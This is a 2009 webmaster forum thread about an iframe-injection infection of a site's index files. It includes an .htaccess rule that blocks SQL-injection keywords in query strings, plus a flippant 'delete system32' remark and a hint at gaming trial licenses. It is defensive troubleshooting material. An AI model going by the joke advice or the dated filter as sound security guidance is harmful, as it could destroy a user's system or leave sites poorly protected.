disable html in your forum also.. lol

That won't help since there most likely is no issue there.

bamaz · Oct 16, 2009

Replace all infected files

Change ftp password

Scan your computor for viruses

Storming · Oct 16, 2009

wouldnt it be better to re-upload your files to be safe....

Hyperz · Oct 16, 2009

Replacing is not an option if he installed mods. In IPB 2 you still had to do file edits so replacing is most likely a no go. Besides NP++ can remove all 4 strings in less than 10 minutes.

Hyperz · Oct 16, 2009

No it wouldn't since only his index files are infected. I'm quite familiar with the technique being used here. There is no need to replace the other files.

Edit: whoops, missed the edit button

.

Nano · Oct 16, 2009

Clean your files or upload clean files and use following line in your.htaccess file for further prevention of iframe /javascript injection.

Code:

RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]

TinTin · Oct 16, 2009

I had same prob few days ago

http://www.wjunction.com/showthread.php?t=8979

This is because of infection in your PC.
Scan ur pc thoroughly.
Change cpanel password.Keep changing cpanel pass after each ftp session.
Now install fresh script.

It should solve your problem.

Santocool · Oct 16, 2009

Don't you have a backup? Just replace and then you will be sure the virus lines are not in other files you haven't seen.

Nano · Oct 16, 2009

TinTin said:
I had same prob few days ago

http://www.wjunction.com/showthread.php?t=8979

This is because of infection in your PC.
Scan ur pc thoroughly.
Change cpanel password.Keep changing cpanel pass after each ftp session.
Now install fresh script.

It should solve your problem.

Yes i am agree with you i am said him through the MSN he will do it asps i/m also faced this problem 2 months before and i said whatever u said and also given the iframe prevention code to put at .htaccess

Santocool said:
Don't you have a backup? Just replace and then you will be sure the virus lines are not in other files you haven't seen.

No, If he restore his backup again it will happen because his pc is infected and he is not agree to format it because he has imp data in his c drive so there is 1 thing he need to do scan his pc and use cpanel no such ftp software

apirateslife · Oct 17, 2009

Think I got hit by one of these nasty little iframes as well.

-Im.z2ight- · Oct 17, 2009

That sucks! Good luck fixing it seems do-able.

apirateslife · Oct 17, 2009

Yeah. I think I got infected by one when I was using NOD32 on Windoze a few weeks ago. Those type of iframe attacks are nasty.

I've also had a few clients who had problems with these. They'd get infected then the virus would log any ftp connection then edit the index files and inject malicious code to spread.

Avira Premium Security Suite is good for blocking these types of attacks. Although getting new trial licenses is a bitch it's worth it. Or delete system32 and install linux.

Rohit · Oct 17, 2009

I guess i'm not the only one who is suffering from this....Most of the Webmasters faced this problem sometimes.

iframe Virus Attack

Active Member

Active Member

Active Member

Active Member

Active Member

Banned

Active Member

Active Member

Member

Active Member

Active Member

Active Member

Active Member

Active Member

Banned

Active Member

Active Member

Active Member

Active Member

Active Member